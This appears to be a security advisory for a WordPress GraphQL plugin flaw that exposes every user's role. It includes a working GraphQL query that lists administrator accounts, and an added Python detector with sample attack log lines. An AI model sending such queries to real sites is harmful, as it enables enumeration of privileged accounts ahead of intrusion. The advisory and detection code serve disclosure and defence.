The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.
query getUsers {
  users(where: {role: ADMINISTRATOR}) {
    edges {
      node {
        userId
        name
      }
    }
  }
}
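A log check for the request pattern described above, as an added example that is not part of the original advisory or the plugin's code: it flags unauthenticated GraphQL requests that filter the `users` connection by role, whether the role is written inline or passed as a variable. The log record fields (`ip`, `authenticated`, `body`), the `RoleType` type name and every sample line are constructed assumptions.

```python
import json
import re

# users(... where:{ ... role: VALUE ... }); VALUE is an enum name or a $variable.
ROLE_FILTER = re.compile(
    r"\busers\s*\([^)]*?\bwhere\s*:\s*\{[^}]*?\brole\s*:\s*(\$?\w+)")

def filtered_role(body):
    """Return the role a GraphQL POST body filters users by, or None."""
    try:
        payload = json.loads(body)
    except ValueError:
        return None
    if not isinstance(payload, dict):
        return None
    match = ROLE_FILTER.search(str(payload.get("query") or ""))
    if not match:
        return None
    value = match.group(1)
    if value.startswith("$"):  # role passed as a GraphQL variable
        value = str((payload.get("variables") or {}).get(value[1:], value))
    return value.upper()

def flag_requests(log_lines):
    """Return (ip, role) for unauthenticated requests that filter users by role."""
    hits = []
    for line in log_lines:
        rec = json.loads(line)
        role = filtered_role(rec["body"])
        if role and not rec["authenticated"]:
            hits.append((rec["ip"], role))
    return hits

def _line(ip, authenticated, query, variables=None):
    body = json.dumps({"query": query, "variables": variables})
    return json.dumps({"ip": ip, "authenticated": authenticated, "body": body})

# Constructed sample log; record layout, addresses and RoleType are assumptions.
SAMPLE_LOG = [
    _line("203.0.113.5", False,
          "query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }"),
    _line("198.51.100.7", False,
          "query q($r: RoleType){ users(first: 5, where:{role:$r}){ edges{ node{ name } } } }",
          {"r": "editor"}),
    _line("192.0.2.10", True, "{ users(where:{role:ADMINISTRATOR}){ edges{ node{ name } } } }"),
    _line("192.0.2.44", False, "{ posts{ edges{ node{ title } } } }"),
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE_LOG))
```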
Rohan Pagey
Rohan Pagey
Yes
2019-07-10 (about 2 years ago)
2022-05-02 (about 2 months ago)
2022-05-03 (about 2 months ago)